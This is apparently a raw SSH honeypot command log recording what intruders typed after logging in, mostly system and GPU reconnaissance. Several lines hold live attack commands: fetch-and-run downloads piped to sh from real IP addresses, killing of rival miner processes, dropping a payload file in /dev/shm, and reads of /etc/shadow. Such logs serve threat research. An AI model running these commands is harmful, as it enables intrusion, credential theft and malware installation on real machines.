line=25924 conn=3852 peer=86.38.24.201 user=kube cmd=sudo sh -c "cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; find . -type f -name 'kstats' -delete ; find . -type f -name 'c.lock' -delete; kill -9 $(ps aux | grep kproc | grep -v grep | awk '{print $2}') 2>/dev/null || true; kill -9 $(ps aux | grep bstats | grep -v grep | awk '{print $2}') 2>/dev/null || true; kill -9 $(ps aux | grep istats | grep -v grep | awk '{print $2}') 2>/dev/null || true"
line=26042 conn=3868 peer=149.210.235.123 user=kube cmd=uname -a
line=26049 conn=3868 peer=149.210.235.123 user=kube cmd=sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done'
line=26056 conn=3868 peer=149.210.235.123 user=kube cmd=cat /proc/cpuinfo | grep processor | wc -l
line=26064 conn=3868 peer=149.210.235.123 user=kube cmd=cd "bash: sh: command not found
line=26075 conn=3868 peer=149.210.235.123 user=kube cmd=
line=26098 conn=3868 peer=149.210.235.123 user=kube cmd=ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10
line=26105 conn=3868 peer=149.210.235.123 user=kube cmd=ps aux | grep astats | grep -v grep | wc -l
line=26112 conn=3868 peer=149.210.235.123 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=26119 conn=3868 peer=149.210.235.123 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=26466 conn=3919 peer=130.12.180.51 user=orangepi cmd=uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; (wget --no-check-certificate -qO- https://46.151.182.82/sh || curl -sk https://46.151.182.82/sh) | sh -s ssh
line=27426 conn=4061 peer=193.32.162.145 user=ubuntu cmd=/bin/./uname -s -v -n -r -m
line=27433 conn=4061 peer=193.32.162.145 user=ubuntu cmd=uptime -p
line=27440 conn=4061 peer=193.32.162.145 user=ubuntu cmd=lspci | grep VGA | cut -f5- -d ' '
line=27447 conn=4061 peer=193.32.162.145 user=ubuntu cmd=lspci | grep VGA -c
line=27454 conn=4061 peer=193.32.162.145 user=ubuntu cmd=nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'
line=27461 conn=4061 peer=193.32.162.145 user=ubuntu cmd=lspci | grep "3D controller" | cut -f5- -d ' '
line=27468 conn=4061 peer=193.32.162.145 user=ubuntu cmd=nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | grep . -c 
line=29144 conn=4276 peer=149.210.235.123 user=kube cmd=uname -a
line=29151 conn=4276 peer=149.210.235.123 user=kube cmd=sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done'
line=29158 conn=4276 peer=149.210.235.123 user=kube cmd=cat /proc/cpuinfo | grep processor | wc -l
line=29166 conn=4276 peer=149.210.235.123 user=kube cmd=cd "bash: sh: command not found
line=29177 conn=4276 peer=149.210.235.123 user=kube cmd=
line=29200 conn=4276 peer=149.210.235.123 user=kube cmd=ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10
line=29207 conn=4276 peer=149.210.235.123 user=kube cmd=ps aux | grep astats | grep -v grep | wc -l
line=29214 conn=4276 peer=149.210.235.123 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=29221 conn=4276 peer=149.210.235.123 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=29228 conn=4276 peer=149.210.235.123 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=29282 conn=4283 peer=45.156.87.99 user=ecs-user cmd=uname -s -v -n -r -m
line=29289 conn=4283 peer=45.156.87.99 user=ecs-user cmd=uname -m | awk '{printf $1}'
line=35014 conn=4997 peer=90.231.215.250 user=kube cmd=nproc
line=35021 conn=4997 peer=90.231.215.250 user=kube cmd=cut -d' ' -f1 /proc/uptime
line=35029 conn=4997 peer=90.231.215.250 user=kube cmd=ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10
line=35036 conn=4997 peer=90.231.215.250 user=kube cmd=ps aux | grep astats | grep -v grep | wc -l
line=35043 conn=4997 peer=90.231.215.250 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=35050 conn=4997 peer=90.231.215.250 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=35057 conn=4997 peer=90.231.215.250 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=35243 conn=5022 peer=104.248.164.226 user=kube cmd=uname -a
line=35250 conn=5022 peer=104.248.164.226 user=kube cmd=sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done'
line=35257 conn=5022 peer=104.248.164.226 user=kube cmd=cat /proc/cpuinfo | grep processor | wc -l
line=35265 conn=5022 peer=104.248.164.226 user=kube cmd=cd "bash: sh: command not found
line=35276 conn=5022 peer=104.248.164.226 user=kube cmd=
line=35299 conn=5022 peer=104.248.164.226 user=kube cmd=ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10
line=35306 conn=5022 peer=104.248.164.226 user=kube cmd=ps aux | grep astats | grep -v grep | wc -l
line=35313 conn=5022 peer=104.248.164.226 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=35320 conn=5022 peer=104.248.164.226 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=35327 conn=5022 peer=104.248.164.226 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=35503 conn=5045 peer=80.94.92.186 user=solana cmd=/bin/./uname -s -v -n -r -m
line=35510 conn=5045 peer=80.94.92.186 user=solana cmd=uptime -p
line=35517 conn=5045 peer=80.94.92.186 user=solana cmd=lspci | grep VGA | cut -f5- -d ' '
line=35524 conn=5045 peer=80.94.92.186 user=solana cmd=lspci | grep VGA -c
line=35531 conn=5045 peer=80.94.92.186 user=solana cmd=nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'
line=35795 conn=5079 peer=176.65.139.95 user=jack cmd=uname -s -v -n -r -m
line=35802 conn=5079 peer=176.65.139.95 user=jack cmd=uname -m | awk '{printf $1}'
line=35827 conn=5081 peer=80.94.92.186 user=solana cmd=/bin/./uname -s -v -n -r -m
line=35834 conn=5081 peer=80.94.92.186 user=solana cmd=uptime -p
line=35845 conn=5081 peer=80.94.92.186 user=solana cmd=lspci | grep VGA | cut -f5- -d ' '
line=40862 conn=5710 peer=80.94.92.186 user=solana cmd=/bin/./uname -s -v -n -r -m
line=40873 conn=5710 peer=80.94.92.186 user=solana cmd=uptime -p
line=40883 conn=5710 peer=80.94.92.186 user=solana cmd=lspci | grep VGA | cut -f5- -d ' '
line=40891 conn=5710 peer=80.94.92.186 user=solana cmd=lspci | grep VGA -c
line=41532 conn=5790 peer=172.174.157.139 user=root cmd=nproc 2>/dev/null || (grep -c '^processor' /proc/cpuinfo 2>/dev/null) || echo 0
line=41539 conn=5790 peer=172.174.157.139 user=root cmd=grep 'model name' /proc/cpuinfo 2>/dev/null | head -1 | cut -d ':' -f2- | sed 's/^ *//' | xargs || echo unknown
line=41553 conn=5790 peer=172.174.157.139 user=root cmd=hostname
line=41561 conn=5790 peer=172.174.157.139 user=root cmd=pwd
line=41568 conn=5790 peer=172.174.157.139 user=root cmd=ls -la /
line=41583 conn=5790 peer=172.174.157.139 user=root cmd=ssh -V
line=41590 conn=5790 peer=172.174.157.139 user=root cmd=uname -m 2>/dev/null || echo unknown
line=41597 conn=5790 peer=172.174.157.139 user=root cmd=netstat -tulpn | head -10
line=41612 conn=5790 peer=172.174.157.139 user=root cmd=history | tail -5
line=41619 conn=5790 peer=172.174.157.139 user=root cmd=uptime
line=41626 conn=5790 peer=172.174.157.139 user=root cmd=mount | head -5
line=41633 conn=5790 peer=172.174.157.139 user=root cmd=env | head -10
line=41644 conn=5790 peer=172.174.157.139 user=root cmd=uname -a
line=41654 conn=5790 peer=172.174.157.139 user=root cmd=whoami
line=41661 conn=5790 peer=172.174.157.139 user=root cmd=ps aux | head -10
line=41673 conn=5790 peer=172.174.157.139 user=root cmd=netstat -tulpn 2>/dev/null | grep LISTEN | head -20
line=41692 conn=5790 peer=172.174.157.139 user=root cmd=ls -la /etc/network/interfaces /etc/sysconfig/network-scripts/ /etc/netplan/ 2>/dev/null | head -5
line=41705 conn=5790 peer=172.174.157.139 user=root cmd=ip addr show 2>/dev/null | grep -E '^[0-9]+:' | head -5
line=41712 conn=5790 peer=172.174.157.139 user=root cmd=ip route show 2>/dev/null | head -3
line=41723 conn=5790 peer=172.174.157.139 user=root cmd=echo test > /tmp/test_1776792796935632465
line=41730 conn=5790 peer=172.174.157.139 user=root cmd=rm -f /tmp/test_1776792796935632465
line=41741 conn=5790 peer=172.174.157.139 user=root cmd=cat /etc/passwd 2>/dev/null | head -1
line=41748 conn=5790 peer=172.174.157.139 user=root cmd=cat /etc/shadow 2>/dev/null | head -1
line=41755 conn=5790 peer=172.174.157.139 user=root cmd=cat /proc/version 2>/dev/null | head -1
line=41762 conn=5790 peer=172.174.157.139 user=root cmd=id
line=41773 conn=5790 peer=172.174.157.139 user=root cmd=whoami
line=41782 conn=5790 peer=172.174.157.139 user=root cmd=pwd
line=41790 conn=5790 peer=172.174.157.139 user=root cmd=cat /proc/cpuinfo | grep 'model name' | head -1
line=41798 conn=5790 peer=172.174.157.139 user=root cmd=uname -r
line=41805 conn=5790 peer=172.174.157.139 user=root cmd=which apt
line=41812 conn=5790 peer=172.174.157.139 user=root cmd=which yum
line=41819 conn=5790 peer=172.174.157.139 user=root cmd=which pacman
line=41826 conn=5790 peer=172.174.157.139 user=root cmd=which zypper
line=41833 conn=5790 peer=172.174.157.139 user=root cmd=systemctl list-units --type=service --state=running 2>/dev/null | head -10
line=41852 conn=5790 peer=172.174.157.139 user=root cmd=ping -c 1 8.8.8.8 2>/dev/null | grep '1 packets transmitted'
line=41863 conn=5790 peer=172.174.157.139 user=root cmd=time dd if=/dev/zero of=/tmp/test bs=1M count=10 2>&1
line=41870 conn=5790 peer=172.174.157.139 user=root cmd=rm -f /tmp/test
line=41877 conn=5790 peer=172.174.157.139 user=root cmd=ss -tuln 2>/dev/null | wc -l
line=42084 conn=5826 peer=2.57.122.238 user=sol cmd=/bin/./uname -s -v -n -r -m
line=42091 conn=5826 peer=2.57.122.238 user=sol cmd=uptime -p
line=42098 conn=5826 peer=2.57.122.238 user=sol cmd=lspci | grep VGA | cut -f5- -d ' '
line=42105 conn=5826 peer=2.57.122.238 user=sol cmd=lspci | grep VGA -c
line=42112 conn=5826 peer=2.57.122.238 user=sol cmd=nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'
line=42119 conn=5826 peer=2.57.122.238 user=sol cmd=lspci | grep "3D controller" | cut -f5- -d ' '
line=42126 conn=5826 peer=2.57.122.238 user=sol cmd=nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | grep . -c 
line=42268 conn=5843 peer=176.65.139.103 user=root cmd=uname -s -v -n -r -m
line=42275 conn=5843 peer=176.65.139.103 user=root cmd=uname -m | awk '{printf $1}'
line=48166 conn=6581 peer=36.139.163.48 user=root cmd=uname -s -m
line=48316 conn=6601 peer=161.35.192.96 user=sol cmd=/bin/./uname -s -v -n -r -m
line=48323 conn=6601 peer=161.35.192.96 user=sol cmd=uptime -p
line=48330 conn=6601 peer=161.35.192.96 user=sol cmd=lspci | grep VGA | cut -f5- -d ' '
line=48337 conn=6601 peer=161.35.192.96 user=sol cmd=lspci | grep VGA -c
line=48344 conn=6601 peer=161.35.192.96 user=sol cmd=nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'
line=48351 conn=6601 peer=161.35.192.96 user=sol cmd=lspci | grep "3D controller" | cut -f5- -d ' '
line=48437 conn=6611 peer=161.35.168.127 user=ps cmd=/bin/./uname -s -v -n -r -m
line=48444 conn=6611 peer=161.35.168.127 user=ps cmd=uptime -p
line=48451 conn=6611 peer=161.35.168.127 user=ps cmd=lspci | grep VGA | cut -f5- -d ' '
line=48458 conn=6611 peer=161.35.168.127 user=ps cmd=lspci | grep VGA -c
line=48465 conn=6611 peer=161.35.168.127 user=ps cmd=nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'
line=48472 conn=6611 peer=161.35.168.127 user=ps cmd=lspci | grep "3D controller" | cut -f5- -d ' '
line=48479 conn=6611 peer=161.35.168.127 user=ps cmd=nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | grep . -c 
line=48743 conn=6644 peer=64.227.132.190 user=root cmd=echo -n login_success
line=49069 conn=6689 peer=172.83.83.85 user=root cmd=uptime
line=49076 conn=6689 peer=172.83.83.85 user=root cmd=hostname
line=49083 conn=6689 peer=172.83.83.85 user=root cmd=whoami
line=49090 conn=6689 peer=172.83.83.85 user=root cmd=pwd
line=49097 conn=6689 peer=172.83.83.85 user=root cmd=ps aux | head -10
line=49104 conn=6689 peer=172.83.83.85 user=root cmd=netstat -tulpn | head -10
line=49111 conn=6689 peer=172.83.83.85 user=root cmd=history | tail -5
line=49118 conn=6689 peer=172.83.83.85 user=root cmd=ssh -V
line=49125 conn=6689 peer=172.83.83.85 user=root cmd=mount | head -5
line=49132 conn=6689 peer=172.83.83.85 user=root cmd=env | head -10
line=49139 conn=6689 peer=172.83.83.85 user=root cmd=uname -a
line=49146 conn=6689 peer=172.83.83.85 user=root cmd=ls -la /
line=49153 conn=6689 peer=172.83.83.85 user=root cmd=netstat -tulpn 2>/dev/null | grep LISTEN | head -20
line=49160 conn=6689 peer=172.83.83.85 user=root cmd=ls -la /etc/network/interfaces /etc/sysconfig/network-scripts/ /etc/netplan/ 2>/dev/null | head -5
line=49167 conn=6689 peer=172.83.83.85 user=root cmd=ip addr show 2>/dev/null | grep -E '^[0-9]+:' | head -5
line=49174 conn=6689 peer=172.83.83.85 user=root cmd=ip route show 2>/dev/null | head -3
line=49181 conn=6689 peer=172.83.83.85 user=root cmd=echo 'test' > /tmp/test_1776823331
line=49188 conn=6689 peer=172.83.83.85 user=root cmd=rm -f /tmp/test_1776823331
line=49195 conn=6689 peer=172.83.83.85 user=root cmd=cat /etc/passwd 2>/dev/null | head -1
line=49202 conn=6689 peer=172.83.83.85 user=root cmd=cat /etc/shadow 2>/dev/null | head -1
line=49209 conn=6689 peer=172.83.83.85 user=root cmd=cat /proc/version 2>/dev/null | head -1
line=49216 conn=6689 peer=172.83.83.85 user=root cmd=id
line=49223 conn=6689 peer=172.83.83.85 user=root cmd=whoami
line=49230 conn=6689 peer=172.83.83.85 user=root cmd=pwd
line=49237 conn=6689 peer=172.83.83.85 user=root cmd=cat /proc/cpuinfo | grep 'model name' | head -1
line=49244 conn=6689 peer=172.83.83.85 user=root cmd=uname -r
line=49251 conn=6689 peer=172.83.83.85 user=root cmd=which apt
line=49258 conn=6689 peer=172.83.83.85 user=root cmd=which yum
line=49265 conn=6689 peer=172.83.83.85 user=root cmd=which pacman
line=49272 conn=6689 peer=172.83.83.85 user=root cmd=which zypper
line=49279 conn=6689 peer=172.83.83.85 user=root cmd=systemctl list-units --type=service --state=running 2>/dev/null | head -10
line=49294 conn=6689 peer=172.83.83.85 user=root cmd=ping -c 1 8.8.8.8 2>/dev/null | grep '1 packets transmitted'
line=49301 conn=6689 peer=172.83.83.85 user=root cmd=time dd if=/dev/zero of=/tmp/test bs=1M count=10 2>&1
line=49308 conn=6689 peer=172.83.83.85 user=root cmd=rm -f /tmp/test
line=49315 conn=6689 peer=172.83.83.85 user=root cmd=ss -tuln 2>/dev/null | wc -l
line=49466 conn=6712 peer=120.48.170.9 user=root cmd=uname -s -m
line=50356 conn=6826 peer=68.183.89.21 user=root cmd=echo -n login_success
line=50636 conn=6862 peer=128.199.20.7 user=root cmd=echo -n login_success
line=50854 conn=6890 peer=159.89.175.226 user=root cmd=echo -n login_success
line=54008 conn=7329 peer=149.210.235.123 user=kube cmd=uname -a
line=54015 conn=7329 peer=149.210.235.123 user=kube cmd=sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done'
line=54022 conn=7329 peer=149.210.235.123 user=kube cmd=cat /proc/cpuinfo | grep processor | wc -l
line=54030 conn=7329 peer=149.210.235.123 user=kube cmd=cd "bash: sh: command not found
line=54041 conn=7329 peer=149.210.235.123 user=kube cmd=
line=54064 conn=7329 peer=149.210.235.123 user=kube cmd=ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10
line=54071 conn=7329 peer=149.210.235.123 user=kube cmd=ps aux | grep astats | grep -v grep | wc -l
line=54082 conn=7329 peer=149.210.235.123 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=54089 conn=7329 peer=149.210.235.123 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=54337 conn=7361 peer=116.193.191.209 user=root cmd=uname -s -v -n -r -m
line=54344 conn=7361 peer=116.193.191.209 user=root cmd=nproc 
line=54351 conn=7361 peer=116.193.191.209 user=root cmd=lspci | egrep VGA && lspci | grep 3D
line=54358 conn=7361 peer=116.193.191.209 user=root cmd=uname -m
line=56166 conn=7602 peer=104.248.164.226 user=kube cmd=uname -a
line=56173 conn=7602 peer=104.248.164.226 user=kube cmd=sh -c 'for d in /dev/shm /tmp /var/run /mnt /root /; do cd "$d" 2>/dev/null && pwd && break; done'
line=56180 conn=7602 peer=104.248.164.226 user=kube cmd=cat /proc/cpuinfo | grep processor | wc -l
line=56188 conn=7602 peer=104.248.164.226 user=kube cmd=cd "bash: sh: command not found
line=56199 conn=7602 peer=104.248.164.226 user=kube cmd=
line=56222 conn=7602 peer=104.248.164.226 user=kube cmd=ps -eo pid,pcpu,comm --sort=-pcpu | head -n 10
line=56233 conn=7602 peer=104.248.164.226 user=kube cmd=ps aux | grep astats | grep -v grep | wc -l
line=56244 conn=7602 peer=104.248.164.226 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=56251 conn=7602 peer=104.248.164.226 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=56258 conn=7602 peer=104.248.164.226 user=kube cmd=cd /dev/shm || cd /tmp || cd /var/run || cd /mnt || cd /root || cd / && cat > astats
line=56744 conn=7666 peer=35.189.174.222 user=root cmd=ssh -V
line=56751 conn=7666 peer=35.189.174.222 user=root cmd=uptime
line=56758 conn=7666 peer=35.189.174.222 user=root cmd=env | head -10
line=56765 conn=7666 peer=35.189.174.222 user=root cmd=hostname
line=56772 conn=7666 peer=35.189.174.222 user=root cmd=uname -a
line=56779 conn=7666 peer=35.189.174.222 user=root cmd=whoami
line=56786 conn=7666 peer=35.189.174.222 user=root cmd=ps aux | head -10
line=56793 conn=7666 peer=35.189.174.222 user=root cmd=history | tail -5
line=56800 conn=7666 peer=35.189.174.222 user=root cmd=mount | head -5
line=56807 conn=7666 peer=35.189.174.222 user=root cmd=pwd
line=56814 conn=7666 peer=35.189.174.222 user=root cmd=ls -la /
line=56821 conn=7666 peer=35.189.174.222 user=root cmd=netstat -tulpn | head -10
line=56828 conn=7666 peer=35.189.174.222 user=root cmd=netstat -tulpn 2>/dev/null | grep LISTEN | head -20
line=56835 conn=7666 peer=35.189.174.222 user=root cmd=ls -la /etc/network/interfaces /etc/sysconfig/network-scripts/ /etc/netplan/ 2>/dev/null | head -5
line=56842 conn=7666 peer=35.189.174.222 user=root cmd=ip addr show 2>/dev/null | grep -E '^[0-9]+:' | head -5
line=56849 conn=7666 peer=35.189.174.222 user=root cmd=ip route show 2>/dev/null | head -3
line=56856 conn=7666 peer=35.189.174.222 user=root cmd=echo 'test' > /tmp/test_1776864708
line=56863 conn=7666 peer=35.189.174.222 user=root cmd=rm -f /tmp/test_1776864708
line=56870 conn=7666 peer=35.189.174.222 user=root cmd=cat /etc/passwd 2>/dev/null | head -1
line=56877 conn=7666 peer=35.189.174.222 user=root cmd=cat /etc/shadow 2>/dev/null | head -1
line=56884 conn=7666 peer=35.189.174.222 user=root cmd=cat /proc/version 2>/dev/null | head -1
line=56891 conn=7666 peer=35.189.174.222 user=root cmd=id
line=56898 conn=7666 peer=35.189.174.222 user=root cmd=whoami
line=56905 conn=7666 peer=35.189.174.222 user=root cmd=pwd
line=56912 conn=7666 peer=35.189.174.222 user=root cmd=cat /proc/cpuinfo | grep 'model name' | head -1
line=56919 conn=7666 peer=35.189.174.222 user=root cmd=uname -r
line=56926 conn=7666 peer=35.189.174.222 user=root cmd=which apt
line=56933 conn=7666 peer=35.189.174.222 user=root cmd=which yum
line=56940 conn=7666 peer=35.189.174.222 user=root cmd=which pacman
line=56947 conn=7666 peer=35.189.174.222 user=root cmd=which zypper
line=56954 conn=7666 peer=35.189.174.222 user=root cmd=systemctl list-units --type=service --state=running 2>/dev/null | head -10
line=56956 conn=7666 peer=35.189.174.222 user=root cmd=time dd if=/dev/zero of=/tmp/test bs=1M count=10 2>&1
line=56963 conn=7666 peer=35.189.174.222 user=root cmd=rm -f /tmp/test
line=56970 conn=7666 peer=35.189.174.222 user=root cmd=ss -tuln 2>/dev/null | wc -l
line=56972 conn=7666 peer=35.189.174.222 user=root cmd=id
line=56979 conn=7666 peer=35.189.174.222 user=root cmd=pwd
line=56989 conn=7666 peer=35.189.174.222 user=root cmd=whoami
line=56996 conn=7666 peer=35.189.174.222 user=root cmd=ping -c 1 8.8.8.8 2>/dev/null | grep '1 packets transmitted'
line=57000 conn=7666 peer=35.189.174.222 user=root cmd=ls /
line=57007 conn=7666 peer=35.189.174.222 user=root cmd=cat /etc/hostname
line=57456 conn=7726 peer=35.189.174.222 user=root cmd=whoami
line=57463 conn=7726 peer=35.189.174.222 user=root cmd=ls -la /
line=57470 conn=7726 peer=35.189.174.222 user=root cmd=netstat -tulpn | head -10
line=57477 conn=7726 peer=35.189.174.222 user=root cmd=ssh -V
line=57484 conn=7726 peer=35.189.174.222 user=root cmd=mount | head -5
line=57491 conn=7726 peer=35.189.174.222 user=root cmd=hostname
line=57498 conn=7726 peer=35.189.174.222 user=root cmd=uname -a
line=57505 conn=7726 peer=35.189.174.222 user=root cmd=pwd
line=57512 conn=7726 peer=35.189.174.222 user=root cmd=ps aux | head -10
line=57519 conn=7726 peer=35.189.174.222 user=root cmd=history | tail -5
line=57526 conn=7726 peer=35.189.174.222 user=root cmd=uptime
line=57533 conn=7726 peer=35.189.174.222 user=root cmd=env | head -10
line=57540 conn=7726 peer=35.189.174.222 user=root cmd=netstat -tulpn 2>/dev/null | grep LISTEN | head -20
line=57547 conn=7726 peer=35.189.174.222 user=root cmd=ls -la /etc/network/interfaces /etc/sysconfig/network-scripts/ /etc/netplan/ 2>/dev/null | head -5
line=57560 conn=7726 peer=35.189.174.222 user=root cmd=ip addr show 2>/dev/null | grep -E '^[0-9]+:' | head -5
line=57568 conn=7726 peer=35.189.174.222 user=root cmd=ip route show 2>/dev/null | head -3
line=57574 conn=7726 peer=35.189.174.222 user=root cmd=echo 'test' > /tmp/test_1776868206
line=57583 conn=7726 peer=35.189.174.222 user=root cmd=rm -f /tmp/test_1776868206
line=57590 conn=7726 peer=35.189.174.222 user=root cmd=cat /etc/passwd 2>/dev/null | head -1
line=57597 conn=7726 peer=35.189.174.222 user=root cmd=cat /etc/shadow 2>/dev/null | head -1
line=57604 conn=7726 peer=35.189.174.222 user=root cmd=cat /proc/version 2>/dev/null | head -1
line=57611 conn=7726 peer=35.189.174.222 user=root cmd=id
line=57618 conn=7726 peer=35.189.174.222 user=root cmd=whoami
line=57625 conn=7726 peer=35.189.174.222 user=root cmd=pwd
line=57632 conn=7726 peer=35.189.174.222 user=root cmd=cat /proc/cpuinfo | grep 'model name' | head -1
line=57639 conn=7726 peer=35.189.174.222 user=root cmd=uname -r
line=57646 conn=7726 peer=35.189.174.222 user=root cmd=which apt
line=57653 conn=7726 peer=35.189.174.222 user=root cmd=which yum
line=57660 conn=7726 peer=35.189.174.222 user=root cmd=which pacman
line=57667 conn=7726 peer=35.189.174.222 user=root cmd=which zypper
line=57674 conn=7726 peer=35.189.174.222 user=root cmd=systemctl list-units --type=service --state=running 2>/dev/null | head -10
line=57676 conn=7726 peer=35.189.174.222 user=root cmd=time dd if=/dev/zero of=/tmp/test bs=1M count=10 2>&1
line=57683 conn=7726 peer=35.189.174.222 user=root cmd=rm -f /tmp/test
line=57690 conn=7726 peer=35.189.174.222 user=root cmd=ss -tuln 2>/dev/null | wc -l
line=57692 conn=7726 peer=35.189.174.222 user=root cmd=id
line=57699 conn=7726 peer=35.189.174.222 user=root cmd=pwd
line=57712 conn=7726 peer=35.189.174.222 user=root cmd=ping -c 1 8.8.8.8 2>/dev/null | grep '1 packets transmitted'
line=57713 conn=7726 peer=35.189.174.222 user=root cmd=whoami
line=57720 conn=7726 peer=35.189.174.222 user=root cmd=ls /
line=57727 conn=7726 peer=35.189.174.222 user=root cmd=cat /etc/hostname
line=58936 conn=7889 peer=2.57.122.238 user=sol cmd=/bin/./uname -s -v -n -r -m
line=58943 conn=7889 peer=2.57.122.238 user=sol cmd=uptime -p
line=58950 conn=7889 peer=2.57.122.238 user=sol cmd=lspci | grep VGA | cut -f5- -d ' '
line=58957 conn=7889 peer=2.57.122.238 user=sol cmd=lspci | grep VGA -c
line=58964 conn=7889 peer=2.57.122.238 user=sol cmd=nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'
line=58971 conn=7889 peer=2.57.122.238 user=sol cmd=lspci | grep "3D controller" | cut -f5- -d ' '
line=58978 conn=7889 peer=2.57.122.238 user=sol cmd=nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | grep . -c 
line=60803 conn=8119 peer=193.142.146.230 user=admin cmd=cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://87.121.79.73/ok; curl -O http://87.121.79.73/ok; chmod 777 ok; sh ok; rm -rf ok; rm -rf ok.*
line=60812 conn=8119 peer=193.142.146.230 user=admin cmd=cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://87.121.79.73/ok; curl -O http://87.121.79.73/ok; chmod 777 ok; sh ok; rm -rf ok; rm -rf ok.*
line=60819 conn=8119 peer=193.142.146.230 user=admin cmd=/bin/sh
line=61168 conn=8162 peer=130.12.180.51 user=orangepi cmd=uname -a; echo -e "\x61\x75\x74\x68\x5F\x6F\x6B\x0A"; (wget --no-check-certificate -qO- https://204.76.203.196/sh || curl -sk https://204.76.203.196/sh) | sh -s ssh
line=61920 conn=8258 peer=193.32.162.145 user=ubuntu cmd=/bin/./uname -s -v -n -r -m
line=61927 conn=8258 peer=193.32.162.145 user=ubuntu cmd=uptime -p
line=61934 conn=8258 peer=193.32.162.145 user=ubuntu cmd=lspci | grep VGA | cut -f5- -d ' '
line=61941 conn=8258 peer=193.32.162.145 user=ubuntu cmd=lspci | grep VGA -c
line=61948 conn=8258 peer=193.32.162.145 user=ubuntu cmd=nvidia-smi -q | grep "Product Name" | head -n 1 | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}'
line=61955 conn=8258 peer=193.32.162.145 user=ubuntu cmd=lspci | grep "3D controller" | cut -f5- -d ' '
line=61962 conn=8258 peer=193.32.162.145 user=ubuntu cmd=nvidia-smi -q | grep "Product Name" | awk '{print $4, $5, $6, $7, $8, $9, $10, $11}' | grep . -c 
line=62284 conn=8298 peer=5.75.200.1 user=root cmd=uname -a
line=62291 conn=8298 peer=5.75.200.1 user=root cmd=uname -m
line=62298 conn=8298 peer=5.75.200.1 user=root cmd=free -h | awk '/Mem/ {print $2}'
line=62305 conn=8298 peer=5.75.200.1 user=root cmd=lscpu | grep "Model name" | sed -r 's/Model name:\s+//'
line=62312 conn=8298 peer=5.75.200.1 user=root cmd=nproc
line=62319 conn=8298 peer=5.75.200.1 user=root cmd=lspci | grep VGA | cut -d ":" -f3 || echo None
line=62326 conn=8298 peer=5.75.200.1 user=root cmd=lsblk -o SIZE | grep -v SIZE | head -n 1
line=62369 conn=8302 peer=5.75.200.1 user=root cmd=unset LANG LANGUAGE LC_CTYPE LC_COLLATE LC_MONETARY LC_NUMERIC LC_TIME LC_MESSAGES LC_ALL HUMAN_BLOCKS LS_COLORS;cd '.';cd '.';cd '.';pwd;ls -la
line=62374 conn=8302 peer=5.75.200.1 user=root cmd=while true; do sleep 1;head -v -n 8 /proc/meminfo; head -v -n 2 /proc/stat /proc/version /proc/uptime /proc/loadavg /proc/sys/fs/file-nr /proc/sys/kernel/hostname; tail -v -n 32 /proc/net/dev;echo '==> /proc/df <==';df -l;echo '==> /proc/who <==';who;echo '==> /proc/end <==';echo '##Moba##'; done
line=63525 conn=8447 peer=103.192.199.168 user=root cmd=hostname
line=63532 conn=8447 peer=103.192.199.168 user=root cmd=uname -a
line=63539 conn=8447 peer=103.192.199.168 user=root cmd=whoami
line=63546 conn=8447 peer=103.192.199.168 user=root cmd=ps aux | head -10
